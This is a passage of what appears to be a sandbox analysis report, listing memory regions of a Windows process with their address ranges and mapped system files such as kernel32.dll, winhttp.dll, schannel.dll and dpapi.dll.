	        filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")

Region:
	              id = 491
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 492
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 493
	        start_va = 0x7ffc17330000
	          end_va = 0x7ffc1739efff
	     entry_point = 0x7ffc17330000
	     region_type = mapped_file
	            name = "coml2.dll"
	        filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll")

Region:
	              id = 494
	        start_va = 0x7ffc173a0000
	          end_va = 0x7ffc173f1fff
	     entry_point = 0x7ffc173a0000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 495
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 496
	        start_va = 0x20f9a2d0000
	          end_va = 0x20f9a2d3fff
	     entry_point = 0x20f9a2d0000
	     region_type = mapped_file
	            name = "cversions.2.db"
	        filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")

Region:
	              id = 497
	        start_va = 0x7ffc133a0000
	          end_va = 0x7ffc133b6fff
	     entry_point = 0x7ffc133a0000
	     region_type = mapped_file
	            name = "cryptsp.dll"
	        filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")

Region:
	              id = 498
	        start_va = 0x7ffc13030000
	          end_va = 0x7ffc13063fff
	     entry_point = 0x7ffc13030000
	     region_type = mapped_file
	            name = "rsaenh.dll"
	        filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")

Region:
	              id = 499
	        start_va = 0x7ffc134c0000
	          end_va = 0x7ffc134cafff
	     entry_point = 0x7ffc134c0000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")

Region:
	              id = 500
	        start_va = 0x8192100000
	          end_va = 0x81921fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008192100000"
	        filename = ""

Region:
	              id = 501
	        start_va = 0x20f9a300000
	          end_va = 0x20f9a318fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a300000"
	        filename = ""

Region:
	              id = 502
	        start_va = 0x20f9a320000
	          end_va = 0x20f9a338fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a320000"
	        filename = ""

Region:
	              id = 503
	        start_va = 0x20f9c360000
	          end_va = 0x20f9c378fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9c360000"
	        filename = ""

Region:
	              id = 504
	        start_va = 0x7ffc079e0000
	          end_va = 0x7ffc07b97fff
	     entry_point = 0x7ffc079e0000
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")

Region:
	              id = 505
	        start_va = 0x7ffc0d740000
	          end_va = 0x7ffc0dac1fff
	     entry_point = 0x7ffc0d740000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")

Region:
	              id = 1686
	        start_va = 0x20f94500000
	          end_va = 0x20f94508fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94500000"
	        filename = ""

Region:
	              id = 1687
	        start_va = 0x20f94510000
	          end_va = 0x20f94518fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94510000"
	        filename = ""

Region:
	              id = 1688
	        start_va = 0x20f94520000
	          end_va = 0x20f9452afff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94520000"
	        filename = ""

Region:
	              id = 1689
	        start_va = 0x20f94540000
	          end_va = 0x20f9454afff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94540000"
	        filename = ""

Region:
	              id = 1690
	        start_va = 0x20f9a1f0000
	          end_va = 0x20f9a1f0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9a1f0000"
	        filename = ""

Region:
	              id = 1691
	        start_va = 0x20f9a2a0000
	          end_va = 0x20f9a2a1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9a2a0000"
	        filename = ""

Region:
	              id = 1692
	        start_va = 0x20f9a2e0000
	          end_va = 0x20f9a2e1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f9a2e0000"
	        filename = ""

Region:
	              id = 1693
	        start_va = 0x20f9a300000
	          end_va = 0x20f9a301fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a300000"
	        filename = ""

Region:
	              id = 1694
	        start_va = 0x20f9a310000
	          end_va = 0x20f9a311fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a310000"
	        filename = ""

Region:
	              id = 1695
	        start_va = 0x20f9a320000
	          end_va = 0x20f9a320fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a320000"
	        filename = ""

Region:
	              id = 1696
	        start_va = 0x20f9a330000
	          end_va = 0x20f9a33ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a330000"
	        filename = ""

Region:
	              id = 1697
	        start_va = 0x20f9a350000
	          end_va = 0x20f9a350fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9a350000"
	        filename = ""

Region:
	              id = 1698
	        start_va = 0x20f9b490000
	          end_va = 0x20f9b491fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b490000"
	        filename = ""

Region:
	              id = 1699
	        start_va = 0x20f9b520000
	          end_va = 0x20f9b520fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b520000"
	        filename = ""

Region:
	              id = 1700
	        start_va = 0x20f9ca10000
	          end_va = 0x20f9ca1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9ca10000"
	        filename = ""

Region:
	              id = 1701
	        start_va = 0x20f9d7f0000
	          end_va = 0x20fa040dfff
	     entry_point = 0x20f9d7f0000
	     region_type = mapped_file
	            name = "imageres.dll"
	        filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll")

Region:
	              id = 1702
	        start_va = 0x20fa08f0000
	          end_va = 0x20fa18bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fa08f0000"
	        filename = ""

Region:
	              id = 1703
	        start_va = 0x7ffc0f200000
	          end_va = 0x7ffc0f2c7fff
	     entry_point = 0x7ffc0f200000
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")

Region:
	              id = 1704
	        start_va = 0x8192300000
	          end_va = 0x81923fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008192300000"
	        filename = ""

Region:
	              id = 1705
	        start_va = 0x7ffc0c8d0000
	          end_va = 0x7ffc0c907fff
	     entry_point = 0x7ffc0c8d0000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")

Region:
	              id = 1706
	        start_va = 0x7ffc16fa0000
	          end_va = 0x7ffc16fa7fff
	     entry_point = 0x7ffc16fa0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")

Region:
	              id = 1707
	        start_va = 0x7ffc0c510000
	          end_va = 0x7ffc0c525fff
	     entry_point = 0x7ffc0c510000
	     region_type = mapped_file
	            name = "dhcpcsvc6.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")

Region:
	              id = 1708
	        start_va = 0x7ffc0c4f0000
	          end_va = 0x7ffc0c509fff
	     entry_point = 0x7ffc0c4f0000
	     region_type = mapped_file
	            name = "dhcpcsvc.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")

Region:
	              id = 1709
	        start_va = 0x7ffc0b3b0000
	          end_va = 0x7ffc0b3c4fff
	     entry_point = 0x7ffc0b3b0000
	     region_type = mapped_file
	            name = "ondemandconnroutehelper.dll"
	        filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")

Region:
	              id = 1710
	        start_va = 0x20f99360000
	          end_va = 0x20f99360fff
	     entry_point = 0x20f99360000
	     region_type = mapped_file
	            name = "counters.dat"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat")

Region:
	              id = 1711
	        start_va = 0x7ffc12490000
	          end_va = 0x7ffc12539fff
	     entry_point = 0x7ffc12490000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")

Region:
	              id = 1712
	        start_va = 0x7ffc132f0000
	          end_va = 0x7ffc1334bfff
	     entry_point = 0x7ffc132f0000
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")

Region:
	              id = 1713
	        start_va = 0x7ffc0c430000
	          end_va = 0x7ffc0c43afff
	     entry_point = 0x7ffc0c430000
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")

Region:
	              id = 1714
	        start_va = 0x7ffc03f90000
	          end_va = 0x7ffc0400ffff
	     entry_point = 0x7ffc03f90000
	     region_type = mapped_file
	            name = "webio.dll"
	        filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")

Region:
	              id = 1715
	        start_va = 0x20f99370000
	          end_va = 0x20f99374fff
	     entry_point = 0x20f99370000
	     region_type = mapped_file
	            name = "winnlsres.dll"
	        filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")

Region:
	              id = 1716
	        start_va = 0x20f99380000
	          end_va = 0x20f9938ffff
	     entry_point = 0x20f99380000
	     region_type = mapped_file
	            name = "winnlsres.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")

Region:
	              id = 1717
	        start_va = 0x7ffc0ad10000
	          end_va = 0x7ffc0ad19fff
	     entry_point = 0x7ffc0ad10000
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")

Region:
	              id = 1718
	        start_va = 0x7ffc0c360000
	          end_va = 0x7ffc0c3c6fff
	     entry_point = 0x7ffc0c360000
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")

Region:
	              id = 1719
	        start_va = 0x7ffc12f70000
	          end_va = 0x7ffc12fe9fff
	     entry_point = 0x7ffc12f70000
	     region_type = mapped_file
	            name = "schannel.dll"
	        filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")

Region:
	              id = 1720
	        start_va = 0x20f99390000
	          end_va = 0x20f99391fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99390000"
	        filename = ""

Region:
	              id = 1721
	        start_va = 0x20f993a0000
	          end_va = 0x20f993a2fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f993a0000"
	        filename = ""

Region:
	              id = 1722
	        start_va = 0x7ffc03cc0000
	          end_va = 0x7ffc03cd3fff
	     entry_point = 0x7ffc03cc0000
	     region_type = mapped_file
	            name = "mskeyprotect.dll"
	        filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll")

Region:
	              id = 1723
	        start_va = 0x7ffc13550000
	          end_va = 0x7ffc13589fff
	     entry_point = 0x7ffc13550000
	     region_type = mapped_file
	            name = "ntasn1.dll"
	        filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")

Region:
	              id = 1724
	        start_va = 0x7ffc13590000
	          end_va = 0x7ffc135b6fff
	     entry_point = 0x7ffc13590000
	     region_type = mapped_file
	            name = "ncrypt.dll"
	        filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")

Region:
	              id = 1725
	        start_va = 0x8192400000
	          end_va = 0x81924fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008192400000"
	        filename = ""

Region:
	              id = 1726
	        start_va = 0x7ffc03d40000
	          end_va = 0x7ffc03d5dfff
	     entry_point = 0x7ffc03d40000
	     region_type = mapped_file
	            name = "ncryptsslp.dll"
	        filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll")

Region:
	              id = 1727
	        start_va = 0x7ffc09ed0000
	          end_va = 0x7ffc0a031fff
	     entry_point = 0x7ffc09ed0000
	     region_type = mapped_file
	            name = "webservices.dll"
	        filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll")

Region:
	              id = 1728
	        start_va = 0x7ffc13070000
	          end_va = 0x7ffc13079fff
	     entry_point = 0x7ffc13070000
	     region_type = mapped_file
	            name = "dpapi.dll"
	        filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")

Region:
	              id = 1729
	        start_va = 0x20f973b0000
	          end_va = 0x20f977bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f973b0000"
	        filename = ""

Region:
	              id = 1730
	        start_va = 0x20f977c0000
	          end_va = 0x20f97bc3fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f977c0000"
	        filename = ""

Region:
	              id = 1731
	        start_va = 0x20f97bd0000
	          end_va = 0x20f97fd1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97bd0000"
	        filename = ""

Region:
	              id = 1732
	        start_va = 0x7ffc138b0000
	          end_va = 0x7ffc13948fff
	     entry_point = 0x7ffc138b0000
	     region_type = mapped_file
	            name = "sxs.dll"
	        filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")

Region:
	              id = 2127
	        start_va = 0x20f94460000
	          end_va = 0x20f94461fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94460000"
	        filename = ""

Region:
	              id = 2128
	        start_va = 0x20f94480000
	          end_va = 0x20f94481fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94480000"
	        filename = ""

Region:
	              id = 2129
	        start_va = 0x20f94500000
	          end_va = 0x20f9450ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94500000"
	        filename = ""

Region:
	              id = 2130
	        start_va = 0x20f94510000
	          end_va = 0x20f9451ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94510000"
	        filename = ""

Region:
	              id = 2131
	        start_va = 0x20f94520000
	          end_va = 0x20f9452bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94520000"
	        filename = ""

Region:
	              id = 2132
	        start_va = 0x20f94540000
	          end_va = 0x20f9454bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f94540000"
	        filename = ""

Region:
	              id = 2133
	        start_va = 0x20f97fe0000
	          end_va = 0x20f97fe0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f97fe0000"
	        filename = ""

Region:
	              id = 2134
	        start_va = 0x20f993a0000
	          end_va = 0x20f993a0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f993a0000"
	        filename = ""

Region:
	              id = 2135
	        start_va = 0x20f993b0000
	          end_va = 0x20f993cefff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f993b0000"
	        filename = ""

Region:
	              id = 2136
	        start_va = 0x20f993d0000
	          end_va = 0x20f998adfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f993d0000"
	        filename = ""

Region:
	              id = 2137
	        start_va = 0x20f998b0000
	          end_va = 0x20f998e5fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f998b0000"
	        filename = ""

Region:
	              id = 2138
	        start_va = 0x20f998f0000
	          end_va = 0x20f998fafff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f998f0000"
	        filename = ""

Region:
	              id = 2139
	        start_va = 0x20f99900000
	          end_va = 0x20f99900fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99900000"
	        filename = ""

Region:
	              id = 2140
	        start_va = 0x20f99930000
	          end_va = 0x20f99965fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99930000"
	        filename = ""

Region:
	              id = 2141
	        start_va = 0x20f99970000
	          end_va = 0x20f9998efff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99970000"
	        filename = ""

Region:
	              id = 2142
	        start_va = 0x20f99990000
	          end_va = 0x20f99990fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99990000"
	        filename = ""

Region:
	              id = 2143
	        start_va = 0x20f999a0000
	          end_va = 0x20f99a75fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f999a0000"
	        filename = ""

Region:
	              id = 2144
	        start_va = 0x20f99a80000
	          end_va = 0x20f99b55fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99a80000"
	        filename = ""

Region:
	              id = 2145
	        start_va = 0x20f99b60000
	          end_va = 0x20f99b6afff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99b60000"
	        filename = ""

Region:
	              id = 2146
	        start_va = 0x20f99b70000
	          end_va = 0x20f99b78fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99b70000"
	        filename = ""

Region:
	              id = 2147
	        start_va = 0x20f99b80000
	          end_va = 0x20f99b88fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020f99b80000"
	        filename = ""

Region:
	              id = 2148
	        start_va = 0x20f99c10000
	          end_va = 0x20f99c10fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99c10000"
	        filename = ""

Region:
	              id = 2149
	        start_va = 0x20f9b560000
	          end_va = 0x20f9b65ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b560000"
	        filename = ""

Region:
	              id = 2150
	        start_va = 0x20f9c950000
	          end_va = 0x20f9c95ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9c950000"
	        filename = ""

Region:
	              id = 2151
	        start_va = 0x20f9cc10000
	          end_va = 0x20f9cc1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9cc10000"
	        filename = ""

Region:
	              id = 2152
	        start_va = 0x7ff6c4dc0000
	          end_va = 0x7ff6c4dcffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff6c4dc0000"
	        filename = ""

Region:
	              id = 2154
	        start_va = 0x20f94550000
	          end_va = 0x20f9455ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94550000"
	        filename = ""

Region:
	              id = 2155
	        start_va = 0x20f94560000
	          end_va = 0x20f9456ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94560000"
	        filename = ""

Region:
	              id = 2156
	        start_va = 0x20f94570000
	          end_va = 0x20f94571fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94570000"
	        filename = ""

Region:
	              id = 2157
	        start_va = 0x20f94580000
	          end_va = 0x20f94580fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94580000"
	        filename = ""

Region:
	              id = 2158
	        start_va = 0x20f972e0000
	          end_va = 0x20f972effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f972e0000"
	        filename = ""

Region:
	              id = 2159
	        start_va = 0x20f972f0000
	          end_va = 0x20f972fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f972f0000"
	        filename = ""

Region:
	              id = 2160
	        start_va = 0x20f97300000
	          end_va = 0x20f97300fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97300000"
	        filename = ""

Region:
	              id = 2161
	        start_va = 0x20f97310000
	          end_va = 0x20f97310fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97310000"
	        filename = ""

Region:
	              id = 2162
	        start_va = 0x20f97320000
	          end_va = 0x20f97320fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97320000"
	        filename = ""

Region:
	              id = 2163
	        start_va = 0x20f97340000
	          end_va = 0x20f97356fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97340000"
	        filename = ""

Region:
	              id = 2164
	        start_va = 0x20f97360000
	          end_va = 0x20f97360fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97360000"
	        filename = ""

Region:
	              id = 2165
	        start_va = 0x20f97370000
	          end_va = 0x20f97372fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97370000"
	        filename = ""

Region:
	              id = 2166
	        start_va = 0x20f99130000
	          end_va = 0x20f99132fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99130000"
	        filename = ""

Region:
	              id = 2167
	        start_va = 0x20f99390000
	          end_va = 0x20f99390fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99390000"
	        filename = ""

Region:
	              id = 2168
	        start_va = 0x20f99910000
	          end_va = 0x20f99913fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99910000"
	        filename = ""

Region:
	              id = 2169
	        start_va = 0x20f99920000
	          end_va = 0x20f99924fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99920000"
	        filename = ""

Region:
	              id = 2170
	        start_va = 0x20f99b90000
	          end_va = 0x20f99b90fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99b90000"
	        filename = ""

Region:
	              id = 2171
	        start_va = 0x20f99ba0000
	          end_va = 0x20f99ba2fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99ba0000"
	        filename = ""

Region:
	              id = 2172
	        start_va = 0x20f99bb0000
	          end_va = 0x20f99bb0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f99bb0000"
	        filename = ""

Region:
	              id = 2173
	        start_va = 0x20f9b660000
	          end_va = 0x20f9b9b3fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f9b660000"
	        filename = ""

Region:
	              id = 2174
	        start_va = 0x7ff6c4db0000
	          end_va = 0x7ff6c4dbffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff6c4db0000"
	        filename = ""

Region:
	              id = 2484
	        start_va = 0x8192500000
	          end_va = 0x81925fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008192500000"
	        filename = ""

Region:
	              id = 2485
	        start_va = 0x20f94570000
	          end_va = 0x20f94570fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f94570000"
	        filename = ""

Region:
	              id = 2486
	        start_va = 0x20f97250000
	          end_va = 0x20f97253fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97250000"
	        filename = ""

Region:
	              id = 2487
	        start_va = 0x20f97260000
	          end_va = 0x20f97263fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97260000"
	        filename = ""

Region:
	              id = 2488
	        start_va = 0x20f97270000
	          end_va = 0x20f97273fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97270000"
	        filename = ""

Region:
	              id = 2489
	        start_va = 0x20f97280000
	          end_va = 0x20f97283fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97280000"
	        filename = ""

Region:
	              id = 2490
	        start_va = 0x20f97290000
	          end_va = 0x20f972a9fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97290000"
	        filename = ""

Region:
	              id = 2491
	        start_va = 0x20f972b0000
	          end_va = 0x20f972b2fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f972b0000"
	        filename = ""

Region:
	              id = 2492
	        start_va = 0x20f972c0000
	          end_va = 0x20f972c0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f972c0000"
	        filename = ""

Region:
	              id = 2493
	        start_va = 0x20f972d0000
	          end_va = 0x20f972d0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f972d0000"
	        filename = ""

Region:
	              id = 2494
	        start_va = 0x20f972e0000
	          end_va = 0x20f972e0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f972e0000"
	        filename = ""

Region:
	              id = 2495
	        start_va = 0x20f972f0000
	          end_va = 0x20f972f0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f972f0000"
	        filename = ""

Region:
	              id = 2496
	        start_va = 0x20f97320000
	          end_va = 0x20f97321fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97320000"
	        filename = ""

Region:
	              id = 2497
	        start_va = 0x20f97340000
	          end_va = 0x20f97340fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97340000"
	        filename = ""

Region:
	              id = 2498
	        start_va = 0x7ffc01c60000
	          end_va = 0x7ffc01f98fff
	     entry_point = 0x7ffc01c60000
	     region_type = mapped_file
	            name = "msftedit.dll"
	        filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll")

Region:
	              id = 2499
	        start_va = 0x8192600000
	          end_va = 0x81926fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008192600000"
	        filename = ""

Region:
	              id = 2500
	        start_va = 0x8192700000
	          end_va = 0x81927fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008192700000"
	        filename = ""

Region:
	              id = 2501
	        start_va = 0x20f97280000
	          end_va = 0x20f97282fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97280000"
	        filename = ""

Region:
	              id = 2502
	        start_va = 0x20f972b0000
	          end_va = 0x20f972b0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f972b0000"
	        filename = ""

Region:
	              id = 2503
	        start_va = 0x20f97300000
	          end_va = 0x20f97303fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97300000"
	        filename = ""

Region:
	              id = 2504
	        start_va = 0x20f97350000
	          end_va = 0x20f97350fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97350000"
	        filename = ""

Region:
	              id = 2505
	        start_va = 0x20f97360000
	          end_va = 0x20f97360fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020f97360000"
	        filename = ""

Region:
	              id = 2506
	        start_va = 0x7ffc0d0c0000
	          end_va = 0x7ffc0d0d8fff
	     entry_point = 0x7ffc0d0c0000
	     region_type = mapped_file
	            name = "samcli.dll"
	        filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")

Region:
	              id = 2507
	        start_va = 0x7ffc12080000
	          end_va = 0x7ffc1209bfff
	     entry_point = 0x7ffc12080000
	     region_type = mapped_file
	            name = "samlib.dll"
	        filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")

Region:
	              id = 2508
	        start_va = 0x7ffc05aa0000
	          end_va = 0x7ffc05b09fff
	     entry_point = 0x7ffc05aa0000
	     region_type = mapped_file
	            name = "oleacc.dll"
	        filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")

Region:
	              id = 2509
	        start_va = 0xa380000
	          end_va = 0xa380fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000a380000"
	        filename = ""

Region:
	              id = 2510
	        start_va = 0xa390000
	          end_va = 0xa390fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000a390000"
	        filename = ""

Region:
	              id = 2511
	        start_va = 0x8192800000
	          end_va = 0x81928fffff
	     entry_point = 0x0
